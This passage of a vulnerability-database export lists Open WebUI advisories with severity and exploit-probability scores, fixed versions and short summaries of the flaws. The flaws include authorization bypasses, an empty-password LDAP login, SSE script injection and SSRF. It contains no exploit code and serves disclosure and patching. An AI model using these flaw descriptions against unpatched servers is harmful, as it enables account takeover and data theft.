value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jxwr-g6r6-j3fx
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jxwr-g6r6-j3fx
reference_id GHSA-jxwr-g6r6-j3fx
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:48:54Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jxwr-g6r6-j3fx
fixed_packages
0
url pkg:pypi/open-webui@0.6.19
purl pkg:pypi/open-webui@0.6.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k9jf-5jzd-pkge
32
vulnerability VCID-n4ma-zcpv-5fbp
33
vulnerability VCID-nxvm-97r4-6ybz
34
vulnerability VCID-pkds-1xgn-q3bv
35
vulnerability VCID-pvep-chj7-ekeg
36
vulnerability VCID-pwsg-72yy-quhk
37
vulnerability VCID-q682-k826-efhv
38
vulnerability VCID-qgfh-7u8n-y7c7
39
vulnerability VCID-qjt1-zxx8-r7ht
40
vulnerability VCID-r7vt-4bqm-f7hb
41
vulnerability VCID-reqw-pfm8-c7g5
42
vulnerability VCID-rhhj-rccv-87hw
43
vulnerability VCID-s625-eg1w-gfd1
44
vulnerability VCID-t571-d65a-cyb2
45
vulnerability VCID-u25g-p4nx-gqd1
46
vulnerability VCID-ujye-g4rj-8be5
47
vulnerability VCID-um53-kf7u-kkg6
48
vulnerability VCID-vghe-uuzj-m7cu
49
vulnerability VCID-vkx3-71kv-sugt
50
vulnerability VCID-w2vd-r3hr-w3bt
51
vulnerability VCID-wb88-83cj-ffhy
52
vulnerability VCID-wcz4-vwx4-tufb
53
vulnerability VCID-yug9-shts-kufb
54
vulnerability VCID-yysb-dk2k-f7g4
55
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19
aliases CVE-2026-44569, GHSA-jxwr-g6r6-j3fx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mn21-kwuu-w7by
42
url VCID-n4ma-zcpv-5fbp
vulnerability_id VCID-n4ma-zcpv-5fbp
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44562
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01322
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01311
published_at 2026-06-11T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01318
published_at 2026-06-13T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01307
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44562
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44562
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44562
3
reference_url https://github.com/advisories/GHSA-mqq6-cqcx-38vg
reference_id GHSA-mqq6-cqcx-38vg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mqq6-cqcx-38vg
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-mqq6-cqcx-38vg
reference_id GHSA-mqq6-cqcx-38vg
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:14:39Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-mqq6-cqcx-38vg
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44562, GHSA-mqq6-cqcx-38vg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n4ma-zcpv-5fbp
43
url VCID-nxvm-97r4-6ybz
vulnerability_id VCID-nxvm-97r4-6ybz
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the type: "file" (non-full-context), type: "text" with collection_name, and bare collection_name/collection_names paths in the get_sources_from_items function perform vector store queries without any authorization check, allowing users to extract content from files and knowledge bases they do not have access to. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44560
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44560
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44560
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44560
3
reference_url https://github.com/advisories/GHSA-h36f-rqpx-j5wx
reference_id GHSA-h36f-rqpx-j5wx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h36f-rqpx-j5wx
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h36f-rqpx-j5wx
reference_id GHSA-h36f-rqpx-j5wx
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:09:48Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h36f-rqpx-j5wx
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44560, GHSA-h36f-rqpx-j5wx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxvm-97r4-6ybz
44
url VCID-pkds-1xgn-q3bv
vulnerability_id VCID-pkds-1xgn-q3bv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44551
reference_id
reference_type
scores
0
value 0.02638
scoring_system epss
scoring_elements 0.86097
published_at 2026-06-14T12:55:00Z
1
value 0.02638
scoring_system epss
scoring_elements 0.86039
published_at 2026-06-11T12:55:00Z
2
value 0.02638
scoring_system epss
scoring_elements 0.861
published_at 2026-06-13T12:55:00Z
3
value 0.02638
scoring_system epss
scoring_elements 0.86089
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44551
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44551
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44551
3
reference_url https://github.com/advisories/GHSA-2r4p-jpmg-48f4
reference_id GHSA-2r4p-jpmg-48f4
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2r4p-jpmg-48f4
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4
reference_id GHSA-2r4p-jpmg-48f4
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-18T14:33:19Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44551, GHSA-2r4p-jpmg-48f4
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pkds-1xgn-q3bv
45
url VCID-pvep-chj7-ekeg
vulnerability_id VCID-pvep-chj7-ekeg
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-64496
reference_id
reference_type
scores
0
value 0.00113
scoring_system epss
scoring_elements 0.29674
published_at 2026-06-14T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30843
published_at 2026-06-13T12:55:00Z
2
value 0.00121
scoring_system epss
scoring_elements 0.30826
published_at 2026-06-12T12:55:00Z
3
value 0.00121
scoring_system epss
scoring_elements 0.30627
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-64496
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca
reference_id 8af6a4cf21b756a66cd58378a01c60f74c39b7ca
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-11-13T21:37:56Z/
url https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-64496
reference_id CVE-2025-64496
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-64496
4
reference_url https://github.com/advisories/GHSA-cm35-v4vp-5xvx
reference_id GHSA-cm35-v4vp-5xvx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cm35-v4vp-5xvx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx
reference_id GHSA-cm35-v4vp-5xvx
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-11-13T21:37:56Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx
fixed_packages
0
url pkg:pypi/open-webui@0.6.35
purl pkg:pypi/open-webui@0.6.35
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-94nj-qkdf-xfhn
21
vulnerability VCID-9jud-sr2a-8yc3
22
vulnerability VCID-chug-ma8r-cucc
23
vulnerability VCID-cw4k-3s8z-uqh8
24
vulnerability VCID-dz6g-jgmg-wqce
25
vulnerability VCID-dzh3-rqx4-fqhv
26
vulnerability VCID-ef1t-pxjm-j7cz
27
vulnerability VCID-hj5f-yk3y-ffdg
28
vulnerability VCID-jfs9-dps1-27a2
29
vulnerability VCID-k9jf-5jzd-pkge
30
vulnerability VCID-n4ma-zcpv-5fbp
31
vulnerability VCID-nxvm-97r4-6ybz
32
vulnerability VCID-pkds-1xgn-q3bv
33
vulnerability VCID-pwsg-72yy-quhk
34
vulnerability VCID-q682-k826-efhv
35
vulnerability VCID-qgfh-7u8n-y7c7
36
vulnerability VCID-qjt1-zxx8-r7ht
37
vulnerability VCID-r7vt-4bqm-f7hb
38
vulnerability VCID-reqw-pfm8-c7g5
39
vulnerability VCID-rhhj-rccv-87hw
40
vulnerability VCID-s625-eg1w-gfd1
41
vulnerability VCID-t571-d65a-cyb2
42
vulnerability VCID-u25g-p4nx-gqd1
43
vulnerability VCID-ujye-g4rj-8be5
44
vulnerability VCID-um53-kf7u-kkg6
45
vulnerability VCID-vghe-uuzj-m7cu
46
vulnerability VCID-vkx3-71kv-sugt
47
vulnerability VCID-w2vd-r3hr-w3bt
48
vulnerability VCID-wb88-83cj-ffhy
49
vulnerability VCID-wcz4-vwx4-tufb
50
vulnerability VCID-yug9-shts-kufb
51
vulnerability VCID-yysb-dk2k-f7g4
52
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35
aliases CVE-2025-64496, GHSA-cm35-v4vp-5xvx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pvep-chj7-ekeg
46
url VCID-pwsg-72yy-quhk
vulnerability_id VCID-pwsg-72yy-quhk
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, there is a vulnerability in chat completion API, which allows attackers to bypass tool restrictions, potentially enabling unauthorized actions or access. In the chat_completion API, the parameters tool_ids and tool_servers are supplied by the user. These parameters are used to create a tools_dict by the middleware. This is then used by get_tool_by_id to retrieve the appropriate tool. However, there is no checks in that ensures the user that uses the API has permission to use the tool, meaning that a user can invoke any server tool by supplying the correct tool_id or tool_servers parameters via the chat completion API. Moreover, the authentication token stored in the server would be used when invoking the tool, so the tool will be invoked with the server privilege. This vulnerability is fixed in 0.8.6.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45350
reference_id
reference_type
scores
0
value 0.00044
scoring_system epss
scoring_elements 0.14156
published_at 2026-06-13T12:55:00Z
1
value 0.00044
scoring_system epss
scoring_elements 0.1413
published_at 2026-06-14T12:55:00Z
2
value 0.00044
scoring_system epss
scoring_elements 0.14042
published_at 2026-06-11T12:55:00Z
3
value 0.00044
scoring_system epss
scoring_elements 0.14159
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45350
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/4737e1f11
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/4737e1f11
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45350
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45350
5
reference_url https://github.com/advisories/GHSA-4pcg-253r-rf9w
reference_id GHSA-4pcg-253r-rf9w
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4pcg-253r-rf9w
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4pcg-253r-rf9w
reference_id GHSA-4pcg-253r-rf9w
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:18:20Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4pcg-253r-rf9w
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-45350, GHSA-4pcg-253r-rf9w
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pwsg-72yy-quhk
47
url VCID-q682-k826-efhv
vulnerability_id VCID-q682-k826-efhv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a Server-Side Request Forgery (SSRF) vulnerability exists in _process_picture_url() in backend/open_webui/utils/oauth.py (line ~1338). The function fetches arbitrary URLs from OAuth picture claims without applying validate_url(), allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45338
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01726
published_at 2026-06-13T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01734
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.0172
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01723
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45338
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45338
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45338
4
reference_url https://github.com/advisories/GHSA-24c9-2m8q-qhmh
reference_id GHSA-24c9-2m8q-qhmh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-24c9-2m8q-qhmh
5
